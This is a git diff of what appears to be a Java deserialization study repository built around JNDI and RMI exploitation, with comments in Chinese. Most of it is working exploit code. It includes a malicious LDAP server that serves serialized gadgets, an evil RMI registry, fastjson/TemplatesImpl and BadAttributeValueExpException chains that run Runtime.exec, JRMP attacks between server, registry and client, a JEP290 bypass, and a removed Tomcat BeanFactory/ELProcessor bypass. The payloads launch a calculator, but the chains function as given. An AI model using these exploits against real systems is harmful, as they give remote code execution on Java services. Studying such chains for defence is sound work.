index 0000000..2ce96bd --- /dev/null +++ b/JNDI/JNDI/src/main/java/LDAP/deserServer.java @@ -0,0 +1,111 @@ +package LDAP; + +import com.unboundid.util.Base64; +import com.unboundid.ldap.listener.InMemoryDirectoryServer; +import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; +import com.unboundid.ldap.listener.InMemoryListenerConfig; +import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; +import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; +import com.unboundid.ldap.sdk.Entry; +import com.unboundid.ldap.sdk.LDAPException; +import com.unboundid.ldap.sdk.LDAPResult; +import com.unboundid.ldap.sdk.ResultCode; +import tools.PayloadGen; +import tools.ReflectTools; + +import javax.net.ServerSocketFactory; +import javax.net.SocketFactory; +import javax.net.ssl.SSLSocketFactory; +import java.net.InetAddress; +import java.net.MalformedURLException; +import java.net.URL; +import java.text.ParseException; + +public class deserServer { + + private static final String LDAP_BASE = "dc=example,dc=com"; + + + public static void main (String[] args) { + + String url = "http://vps:8000/#ExportObject"; + int port = 1389; + + + try { + InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); + config.setListenerConfigs(new InMemoryListenerConfig( + "listen", + InetAddress.getByName("0.0.0.0"), + port, + ServerSocketFactory.getDefault(), + SocketFactory.getDefault(), + (SSLSocketFactory) SSLSocketFactory.getDefault())); + + config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url))); + InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); + System.out.println("Listening on 0.0.0.0:" + port); + ds.startListening(); + + } + catch ( Exception e ) { + e.printStackTrace(); + } + } + + private static class OperationInterceptor extends InMemoryOperationInterceptor { + + private URL codebase; + + + /** + * */ public OperationInterceptor ( URL cb ) { + this.codebase = cb; + } + + + /** + * {@inheritDoc} + * * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) + */ @Override + public void processSearchResult ( InMemoryInterceptedSearchResult result ) { + String base = result.getRequest().getBaseDN(); + Entry e = new Entry(base); + try { + sendResult(result, base, e); + } + catch ( Exception e1 ) { + e1.printStackTrace(); + } + + } + + + protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception { + URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); + System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); + e.addAttribute("javaClassName", "Exploit"); + String cbstring = this.codebase.toString(); + int refPos = cbstring.indexOf('#'); + if ( refPos > 0 ) { + cbstring = cbstring.substring(0, refPos); + } + + // Payload1: 利用LDAP+Reference Factory +// e.addAttribute("javaCodeBase", cbstring); +// e.addAttribute("objectClass", "javaNamingReference"); +// e.addAttribute("javaFactory", this.codebase.getRef()); + + // Payload2: 返回序列化Gadget + try { + e.addAttribute("javaSerializedData", ReflectTools.ser2bytes(PayloadGen.getPayload())); + } catch (ParseException exception) { + exception.printStackTrace(); + } + + result.sendSearchEntry(e); + result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); + } + + } +} \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/RMI/Client.java b/JNDI/JNDI/src/main/java/RMI/Client.java new file mode 100644 index 0000000..3ca3c85 --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/Client.java @@ -0,0 +1,23 @@ +package RMI; + +import java.rmi.NotBoundException; +import java.rmi.RemoteException; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; + +public class Client { + public static void main(String[] args) throws Exception { + serverAttackClientWithJRMP(); + } + + // 从registry获取的stub指向恶意skel，通过DGC JRMP，实现server打client + public static void serverAttackClientWithJRMP() throws Exception{ + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 13999); + registry.lookup("951d14"); + } + + public static void rmiDeser() throws Exception{ + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 50388); + registry.lookup("c4e578"); + } +} diff --git a/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java b/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java new file mode 100644 index 0000000..704bd81 --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java @@ -0,0 +1,350 @@ +package RMI; + +import java.io.BufferedInputStream; +import java.io.BufferedOutputStream; +import java.io.DataInputStream; +import java.io.DataOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.io.ObjectStreamClass; +import java.io.OutputStream; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.net.Socket; +import java.net.SocketException; +import java.net.URL; +import java.net.URLClassLoader; +import java.rmi.MarshalException; +import java.rmi.server.ObjID; +import java.rmi.server.UID; +import javax.net.ServerSocketFactory; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import tools.PayloadGen; + +// 在client lookup后，直接返回恶意stub，进行反序列化 +public class EvilRegistry implements Runnable { + public static void main(String[] args) { + //before you start it, you should set vm options:"--add-opens=java.base/sun.nio.ch=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=jdk.unsupported/sun.misc=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.base/java.lang.reflect=ALL-UNNAMED" + EvilRegistry.start(); + } + private static final Logger log = LoggerFactory.getLogger(EvilRegistry.class); + public String ip; + public int port; + private ServerSocket ss; + private final Object waitLock = new Object(); + private boolean exit; + private boolean hadConnection; + private static EvilRegistry serverInstance; + + public EvilRegistry(String ip, int port) { + try { + this.ip = ip; + this.port = port; + this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port); + } catch (Exception e) { + e.printStackTrace(); + } + + } + + public static synchronized void start() { + serverInstance = new EvilRegistry("0.0.0.0", 8899); + Thread serverThread = new Thread(serverInstance); + serverThread.start(); + log.warn("[RMI RMI.Server] is already running."); + } + + public static synchronized void stop() { + if (serverInstance != null) { + serverInstance.exit = true; + + try { + serverInstance.ss.close(); + } catch (IOException e) { + e.printStackTrace(); + } + + serverInstance = null; + System.out.println("[RMI RMI.Server] stopped."); + } + + } + + public boolean waitFor(int i) { + try { + if (this.hadConnection) { + return true; + } else { + System.out.println("[RMI RMI.Server] Waiting for connection"); + synchronized(this.waitLock) { + this.waitLock.wait((long)i); + } + + return this.hadConnection; + } + } catch (InterruptedException var5) { + return false; + } + } + + public void close() { + this.exit = true; + + try { + this.ss.close(); + } catch (IOException var4) { + } + + synchronized(this.waitLock) { + this.waitLock.notify(); + } + } + + public void run() { + System.out.println("[RMI RMI.Server] Listening on {}:{}" + "127.0.0.1" + "8899"); + + try { + Socket s = null; + + try { + while(!this.exit && (s = this.ss.accept()) != null) { + try { + s.setSoTimeout(5000); + InetSocketAddress remote = (InetSocketAddress)s.getRemoteSocketAddress(); + System.out.println("[RMI RMI.Server] Have connection from " + remote); + InputStream is = s.getInputStream(); + InputStream bufIn = (InputStream)(is.markSupported() ? is : new BufferedInputStream(is)); + bufIn.mark(4); + DataInputStream in = new DataInputStream(bufIn); + Throwable var6 = null; + + try { + int magic = in.readInt(); + short version = in.readShort(); + if (magic == 1246907721 && version == 2) { + OutputStream sockOut = s.getOutputStream(); + BufferedOutputStream bufOut = new BufferedOutputStream(sockOut); + DataOutputStream out = new DataOutputStream(bufOut); + Throwable var12 = null; + + try { + byte protocol = in.readByte(); + switch (protocol) { + case 75: + out.writeByte(78); + if (remote.getHostName() != null) { + out.writeUTF(remote.getHostName()); + } else { + out.writeUTF(remote.getAddress().toString()); + } + + out.writeInt(remote.getPort()); + out.flush(); + in.readUTF(); + in.readInt(); + case 76: + this.doMessage(s, in, out); + bufOut.flush(); + out.flush(); + break; + case 77: + default: + System.out.println("[RMI RMI.Server] Unsupported protocol"); + s.close(); + } + } catch (Throwable var88) { + var12 = var88; + throw var88; + } finally { + if (out != null) { + if (var12 != null) { + try { + out.close(); + } catch (Throwable var87) { + var12.addSuppressed(var87); + } + } else { + out.close(); + } + } + + } + } else { + s.close(); + } + } catch (Throwable var90) { + var6 = var90; + throw var90; + } finally { + if (in != null) { + if (var6 != null) { + try { + in.close(); + } catch (Throwable var86) { + var6.addSuppressed(var86); + } + } else { + in.close(); + } + } + + } + } catch (InterruptedException var92) { + return; + } catch (Exception e) { + e.printStackTrace(System.err); + } finally { + System.out.println("[RMI RMI.Server] Closing connection"); + s.close(); + } + } + + return; + } finally { + if (s != null) { + s.close(); + } + + if (this.ss != null) { + this.ss.close(); + } + + } + } catch (SocketException var96) { + } catch (Exception e) { + e.printStackTrace(System.err); + } + + } + + private void doMessage(Socket s, DataInputStream in, DataOutputStream out) throws Exception { + System.out.println("[RMI RMI.Server] Reading message..."); + int op = in.read(); + switch (op) { + case 80: + this.doCall(s, in, out); + break; + case 81: + case 83: + default: + throw new IOException("unknown transport op " + op); + case 82: + out.writeByte(83); + break; + case 84: + UID.read(in); + } + + s.close(); + } + + private void doCall(Socket s, DataInputStream in, DataOutputStream out) throws Exception { + ObjectInputStream ois = new ObjectInputStream(in) { + protected Class resolveClass(ObjectStreamClass desc) throws IOException { + if ("[Ljava.rmi.server.ObjID;".equals(desc.getName())) { + return ObjID[].class; + } else if ("java.rmi.server.ObjID".equals(desc.getName())) { + return ObjID.class; + } else if ("java.rmi.server.UID".equals(desc.getName())) { + return UID.class; + } else if ("java.lang.String".equals(desc.getName())) { + return String.class; + } else { + throw new IOException("Not allowed to read object"); + } + } + }; + + ObjID read; + try { + read = ObjID.read(ois); + } catch (IOException e) { + throw new MarshalException("unable to read objID", e); + } + + if (read.hashCode() == 2) { + handleDGC(ois); + } else if (read.hashCode() == 0) { + if (this.handleRMI(s, ois, out)) { + this.hadConnection = true; + synchronized(this.waitLock) { + this.waitLock.notifyAll(); + return; + } + } + + s.close(); + } + + } + + private boolean handleRMI(Socket s, ObjectInputStream ois, DataOutputStream out) throws Exception { + int method = ois.readInt(); + ois.readLong(); + if (method != 2) { + return false; + } else { + String object = (String)ois.readObject(); + out.writeByte(81); + + Object obj; + try (ObjectOutputStream oos = new MarshalOutputStream(out, "evil")) { + oos.writeByte(1); + (new UID()).write(oos); + String path = "/" + object; + System.out.println("[RMI RMI.Server] Send payloadData for " + path); + System.out.println(); + new Object(); + obj = PayloadGen.getPayload();//替换为序列化数据 + oos.writeObject(obj); + oos.flush(); + out.flush(); + return true; + } + } + } + private static void handleDGC(ObjectInputStream ois) throws IOException, ClassNotFoundException { + ois.readInt(); + ois.readLong(); + } + static final class MarshalOutputStream extends ObjectOutputStream { + private String sendUrl; + + public MarshalOutputStream(OutputStream out, String u) throws IOException { + super(out); + this.sendUrl = u; + } + + MarshalOutputStream(OutputStream out) throws IOException { + super(out); + } + + protected void annotateClass(Class cl) throws IOException { + if (this.sendUrl != null) { + this.writeObject(this.sendUrl); + } else if (!(cl.getClassLoader() instanceof URLClassLoader)) { + this.writeObject((Object)null); + } else { + URL[] us = ((URLClassLoader)cl.getClassLoader()).getURLs(); + String cb = ""; + + for(URL u : us) { + cb = cb + u.toString(); + } + + this.writeObject(cb); + } + + } + + protected void annotateProxyClass(Class cl) throws IOException { + this.annotateClass(cl); + } + } + + +} \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/RMI/MyRegistry.java b/JNDI/JNDI/src/main/java/RMI/MyRegistry.java new file mode 100644 index 0000000..c70761c --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/MyRegistry.java @@ -0,0 +1,14 @@ +package RMI; + +import remoteObj.HelloImpl; + +import java.rmi.AlreadyBoundException; +import java.rmi.RemoteException; +import java.rmi.registry.LocateRegistry; + +public class MyRegistry { + public static void main(String[] args) throws RemoteException, AlreadyBoundException { + java.rmi.registry.Registry registry = LocateRegistry.createRegistry(1099); + registry.bind("hello", new HelloImpl()); + } +} diff --git a/JNDI/JNDI/src/main/java/RMI/Server.java b/JNDI/JNDI/src/main/java/RMI/Server.java new file mode 100644 index 0000000..d39d2de --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/Server.java @@ -0,0 +1,78 @@ +package RMI; + +import com.alibaba.fastjson.JSONArray; +import remoteObj.HelloImpl; +import sun.rmi.server.UnicastRef; +import sun.rmi.transport.LiveRef; +import sun.rmi.transport.tcp.TCPEndpoint; +import tools.ClassByteGen; +import tools.InvocationHandlerImpl; +import tools.ReflectTools; +import tools.TemplatesGen; + +import javax.management.BadAttributeValueExpException; +import javax.xml.transform.Templates; +import java.lang.reflect.Proxy; +import java.rmi.Remote; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; +import java.rmi.server.ObjID; +import java.rmi.server.RemoteObjectInvocationHandler; +import java.util.Random; + +public class Server { + + public static void main(String[] args) throws Exception { + serverAttackRegistryWithJRMP(); + } + + // 正常绑定远程对象 + public static void bind() throws Exception { + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); + registry.bind("HelloImpl", new HelloImpl()); + } + + + // fastjson原生反序列化触发getter，bind实现server打registry，适用于<8u121 + public static void serverAttackRegistryWithBind() throws Exception { + String code = "{\n" + + " Runtime.getRuntime().exec(\"calc\");\n" + + " }"; + byte[] bytes = ClassByteGen.getBytes(code, "AAAA"); + Templates templates = TemplatesGen.getTemplates(bytes, null); + JSONArray jsonArray = new JSONArray(); + jsonArray.add(templates); + + BadAttributeValueExpException bad = new BadAttributeValueExpException("aaa"); + ReflectTools.setFieldValue(bad, "val", jsonArray); + + InvocationHandlerImpl invocationHandler = new InvocationHandlerImpl(bad); + Remote o = (Remote) Proxy.newProxyInstance(invocationHandler.getClass().getClassLoader(), new Class[]{Remote.class}, invocationHandler); + + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); + registry.bind("evil1", o); + } + + // 将stub里的skel地址指向恶意JRMP服务，实现server打registry + public static void serverAttackRegistryWithJRMP() throws Exception { + ObjID id = new ObjID(new Random().nextInt()); // RMI registry + TCPEndpoint te = new TCPEndpoint("127.0.0.1", 13999); + UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); + RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref); + Registry proxy = (Registry) Proxy.newProxyInstance(Server.class.getClassLoader(), new Class[] { + Registry.class + }, obj); + + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); + registry.bind("evil24", proxy); + } + + // 通过DGC JRMP实现registry打server + public static void registerAttackServer() throws Exception { + // java-chains启动恶意JRMP服务 + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 13999); + HelloImpl hello = new HelloImpl(); + registry.bind("evil3", hello); + } + +} diff --git a/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java b/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java new file mode 100644 index 0000000..e78572b --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java @@ -0,0 +1,73 @@ +package RMI; + +import sun.rmi.registry.RegistryImpl_Stub; +import sun.rmi.server.UnicastRef; +import sun.rmi.transport.LiveRef; +import sun.rmi.transport.tcp.TCPEndpoint; + +import java.io.ObjectOutput; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.Proxy; +import java.rmi.Remote; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; +import java.rmi.server.*; +import java.util.Random; + +// 绕过JEP290(8u231~8u240) +public class ServerBypassJEP290 { + public static void main(String[] args) throws Exception { + UnicastRemoteObject payload = getPayload(); + java.rmi.registry.Registry registry = LocateRegistry.getRegistry(1099); + bindReflection("pwn", payload, registry); + } + + static UnicastRemoteObject getPayload() throws Exception { + ObjID id = new ObjID(new Random().nextInt()); + TCPEndpoint te = new TCPEndpoint("localhost", 13999); + UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); + + System.getProperties().put("sun.misc.ProxyGenerator.saveGeneratedFiles", "true"); + RemoteObjectInvocationHandler handler = new RemoteObjectInvocationHandler(ref); + RMIServerSocketFactory factory = (RMIServerSocketFactory) Proxy.newProxyInstance( + handler.getClass().getClassLoader(), + new Class[]{RMIServerSocketFactory.class, Remote.class}, + handler + ); + + Constructor constructor = UnicastRemoteObject.class.getDeclaredConstructor(); + constructor.setAccessible(true); + UnicastRemoteObject unicastRemoteObject = constructor.newInstance(); + + Field field_ssf = UnicastRemoteObject.class.getDeclaredField("ssf"); + field_ssf.setAccessible(true); + field_ssf.set(unicastRemoteObject, factory); + + return unicastRemoteObject; + } + + static void bindReflection(String name, Object obj, Registry registry) throws Exception { + Field ref_filed = RemoteObject.class.getDeclaredField("ref"); + ref_filed.setAccessible(true); + UnicastRef ref = (UnicastRef) ref_filed.get(registry); + + Field operations_filed = RegistryImpl_Stub.class.getDeclaredField("operations"); + operations_filed.setAccessible(true); + Operation[] operations = (Operation[]) operations_filed.get(registry); + + RemoteCall remoteCall = ref.newCall((RemoteObject) registry, operations, 0, 4905912898345647071L); + ObjectOutput outputStream = remoteCall.getOutputStream(); + + Field enableReplace_filed = ObjectOutputStream.class.getDeclaredField("enableReplace"); + enableReplace_filed.setAccessible(true); + enableReplace_filed.setBoolean(outputStream, false); + + outputStream.writeObject(name); + outputStream.writeObject(obj); + + ref.invoke(remoteCall); + ref.done(remoteCall); + } +} diff --git a/JNDI/JNDI/src/main/java/RMIServer.java b/JNDI/JNDI/src/main/java/RMIServer.java new file mode 100644 index 0000000..d65eb3f --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMIServer.java @@ -0,0 +1,18 @@ +import com.sun.jndi.rmi.registry.ReferenceWrapper; + +import java.rmi.AlreadyBoundException; +import java.rmi.RemoteException; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; +import javax.naming.NamingException; +import javax.naming.Reference; + +public class RMIServer { + public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { + Registry registry = LocateRegistry.createRegistry(1099); + // factory表示加载的类的url和类名，所以恶意类文件必须以全类名命名 + Reference reference = new Reference("Calc1233", "Calc", "http://127.0.0.1:7777/"); + ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); + registry.bind("Calc123", referenceWrapper); + } +} diff --git a/JNDI/JNDI/src/main/java/remoteObj/Hello.java b/JNDI/JNDI/src/main/java/remoteObj/Hello.java new file mode 100644 index 0000000..83be131 --- /dev/null +++ b/JNDI/JNDI/src/main/java/remoteObj/Hello.java @@ -0,0 +1,8 @@ +package remoteObj; + +import java.rmi.Remote; +import java.rmi.RemoteException; + +public interface Hello extends Remote { + public String hello(String name) throws RemoteException; +} diff --git a/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java b/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java new file mode 100644 index 0000000..291d8c1 --- /dev/null +++ b/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java @@ -0,0 +1,14 @@ +package remoteObj; + +import java.rmi.RemoteException; +import java.rmi.server.UnicastRemoteObject; + +public class HelloImpl extends UnicastRemoteObject implements Hello { + public HelloImpl() throws RemoteException { + } + + @Override + public String hello(String name) throws RemoteException { + return "hello " + name; + } +} diff --git a/JNDI/JNDI/src/main/java/tools/ClassByteGen.java b/JNDI/JNDI/src/main/java/tools/ClassByteGen.java new file mode 100644 index 0000000..9275013 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/ClassByteGen.java @@ -0,0 +1,29 @@ +package tools; + +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtConstructor; + +public class ClassByteGen { + public static byte[] getBytes(String code, String className) throws Exception { +// String Abstract = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"; + ClassPool pool = ClassPool.getDefault(); +// pool.importPackage(Abstract); + pool.importPackage("java.io"); + pool.importPackage("java.nio.file"); + pool.importPackage("java.lang.reflect"); + pool.importPackage("java.nio.charset"); + pool.importPackage("java.util"); +// pool.insertClassPath(Abstract); +// pool.insertClassPath("java.nio"); + CtClass ctClass = pool.makeClass(className); +// ctClass.setSuperclass(pool.get(Abstract)); + CtConstructor ctConstructor = ctClass.makeClassInitializer(); + ctConstructor.setBody(code); +// CtConstructor ctConstructor1 = new CtConstructor(new CtClass[]{}, ctClass); +// ctConstructor1.setBody(code); +// ctClass.addConstructor(ctConstructor1); + ctClass.writeFile("ClassByteGen"); + return ctClass.toBytecode(); + } +} diff --git a/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java b/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java new file mode 100644 index 0000000..7c15d95 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java @@ -0,0 +1,19 @@ +package tools; + +import java.io.Serializable; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Method; + +// 动态代理，实现对象接口转化 +public class InvocationHandlerImpl implements InvocationHandler, Serializable { + private Object object; + + public InvocationHandlerImpl(Object obj) { + this.object = obj; + } + + @Override + public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { + return null; + } +} diff --git a/JNDI/JNDI/src/main/java/tools/Payload.java b/JNDI/JNDI/src/main/java/tools/Payload.java new file mode 100644 index 0000000..5396724 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/Payload.java @@ -0,0 +1,10 @@ +package tools; + +public abstract class Payload { +// public Templates getTemplates(byte[] byteCode, String bytePath) throws Exception { +// Templates templates = TemplatesGen.getTemplates(byteCode, bytePath); +// return templates; +// } + + public abstract String getPayload(byte[] byteCode, String bytePath) throws Exception; +} diff --git a/JNDI/JNDI/src/main/java/tools/PayloadGen.java b/JNDI/JNDI/src/main/java/tools/PayloadGen.java new file mode 100644 index 0000000..475286b --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/PayloadGen.java @@ -0,0 +1,23 @@ +package tools; + +import com.alibaba.fastjson.JSONArray; + +import javax.management.BadAttributeValueExpException; +import javax.xml.transform.Templates; + +public class PayloadGen { + public static Object getPayload() throws Exception { + String code = "{\n" + + " Runtime.getRuntime().exec(\"calc\");\n" + + " }"; + byte[] bytes = ClassByteGen.getBytes(code, "AAAA"); + Templates templates = TemplatesGen.getTemplates(bytes, null); + JSONArray jsonArray = new JSONArray(); + jsonArray.add(templates); + + BadAttributeValueExpException bad = new BadAttributeValueExpException("aaa"); + ReflectTools.setFieldValue(bad, "val", jsonArray); + + return bad; + } +} diff --git a/JNDI/JNDI/src/main/java/tools/ReflectTools.java b/JNDI/JNDI/src/main/java/tools/ReflectTools.java new file mode 100644 index 0000000..e064009 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/ReflectTools.java @@ -0,0 +1,71 @@ +package tools; + +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtField; + +import java.io.*; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Modifier; +import java.lang.reflect.Proxy; +import java.util.Base64; + +public class ReflectTools { + public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { + Class aClass = obj.getClass(); + Field field = null; + try { + field = aClass.getDeclaredField(fieldName); + } catch (NoSuchFieldException e) { + aClass = aClass.getSuperclass(); + } + field.setAccessible(true); + field.set(obj, value); + } + + // 生成不继承Serializable接口的Class，防止因suid不一样报错 + public static Class makeClass(String className, String suid) throws ClassNotFoundException, CannotCompileException { + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass(className); + + if (suid != null) { + // 添加 serialVersionUID 字段并指定其值 + CtField serialVersionUIDField = new CtField(CtClass.longType, "serialVersionUID", ctClass); + serialVersionUIDField.setModifiers(Modifier.PRIVATE | Modifier.STATIC | Modifier.FINAL); // 设置为private static final + ctClass.addField(serialVersionUIDField, suid); // 设置 serialVersionUID 值为 1L + } + + Class aClass = ctClass.toClass(); + return aClass; + } + + public static byte[] ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(obj); + return baos.toByteArray(); + } + + public static void ser2file(Object obj, String fileName) throws IOException { + FileOutputStream fos = new FileOutputStream(fileName); + ObjectOutputStream oos = new ObjectOutputStream(fos); + oos.writeObject(obj); + } + + public static Object deser(byte[] bytes, String base64) throws IOException, ClassNotFoundException { + if (bytes != null) { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + }else { + byte[] decode = Base64.getDecoder().decode(base64); + ByteArrayInputStream bais = new ByteArrayInputStream(decode); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + } + } + + +} diff --git a/JNDI/JNDI/src/main/java/tools/TemplatesGen.java b/JNDI/JNDI/src/main/java/tools/TemplatesGen.java new file mode 100644 index 0000000..5fbf00d --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/TemplatesGen.java @@ -0,0 +1,35 @@ +package tools; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; + +import javax.xml.transform.Templates; +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class TemplatesGen { + public static Templates getTemplates(byte[] byteCode, String bytePath) throws IOException, IllegalAccessException, CannotCompileException { + byte[] evilBytes; + if (byteCode != null) { + evilBytes = byteCode; + }else { + evilBytes = Files.readAllBytes(Paths.get(bytePath)); + } + TemplatesImpl templates = new TemplatesImpl(); + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass("useless"); + byte[] useless = ctClass.toBytecode(); + ReflectTools.setFieldValue(templates, "_name", "1diot9"); + ReflectTools.setFieldValue(templates, "_class", null); +// ReflectTools.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + ReflectTools.setFieldValue(templates, "_transletIndex", 0); + // 修改bytecodes数量和transletIndex，这样就不用继承AbstractTranslet + ReflectTools.setFieldValue(templates, "_bytecodes", new byte[][]{evilBytes, useless}); + return templates; + } + +} diff --git a/JNDI/JNDI_vul/.idea/encodings.xml b/JNDI/JNDI_vul/.idea/encodings.xml deleted file mode 100644 index 8c3a518..0000000 --- a/JNDI/JNDI_vul/.idea/encodings.xml +++ /dev/null @@ -1,11 +0,0 @@ - - - - - - - - - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/pom.xml b/JNDI/JNDI_vul/pom.xml deleted file mode 100644 index d79e385..0000000 --- a/JNDI/JNDI_vul/pom.xml +++ /dev/null @@ -1,93 +0,0 @@ - - - 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - pom - - server - client - - - - 8 - 8 - UTF-8 - - - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - test - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - compile - - - org.apache.tomcat - tomcat-catalina - 8.5.51 - - - org.apache.tomcat - tomcat-jasper - 8.5.51 - - - commons-collections - commons-collections - 3.2.1 - - - - org.apache.xbean - xbean-reflect - 4.18 - - - - - com.h2database - h2 - 2.2.220 - - - - - - commons-dbcp - commons-dbcp - 1.4 - - - - commons-pool - commons-pool - 1.5.4 - - - - - org.apache.commons - commons-dbcp2 - 2.9.0 - - - - - org.apache.tomcat - tomcat-jdbc - 8.5.51 - - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java b/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java deleted file mode 100644 index 49ee34e..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java +++ /dev/null @@ -1,15 +0,0 @@ -package factory.beanFactory; - -import javax.el.ELProcessor; - -public class EL_test { - public static void main(String[] args) { - ELProcessor elProcessor = new ELProcessor(); - // 将 Runtime 对象注入到 EL 上下文中 - elProcessor.defineBean("runtime", Runtime.getRuntime()); - - // 使用 EL 表达式调用 exec 方法 - String expression = "${runtime.exec('calc')}"; - elProcessor.eval(expression); - } -} diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java b/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java deleted file mode 100644 index 2ac7315..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java +++ /dev/null @@ -1,31 +0,0 @@ -package factory.beanFactory; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; -import org.apache.naming.ResourceRef; - -import javax.naming.StringRefAddr; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -// JNDI 高版本 jdk 绕过服务端，用 bind 的方式 -public class JNDIBypassHighJavaServerEL { - public static void main(String[] args) throws Exception { - System.out.println("[*]Evil RMI Server is Listening on port: 1099"); - Registry registry = LocateRegistry.createRegistry(1099); - - // 实例化Reference，指定目标类为javax.el.ELProcessor，工厂类为org.apache.naming.factory.BeanFactory - ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", - true,"org.apache.naming.factory.BeanFactory",null); - - // 强制将'x'属性的setter从'setX'变为'eval', 详细逻辑见BeanFactory.getObjectInstance代码 - ref.add(new StringRefAddr("forceString", "x=eval")); - - // 利用表达式执行命令 - ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\")" + - ".newInstance().getEngineByName(\"JavaScript\")" + - ".eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")")); - System.out.println("[*]Evil command: calc"); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref); - registry.bind("Object", referenceWrapper); -} -} \ No newline at end of file diff --git 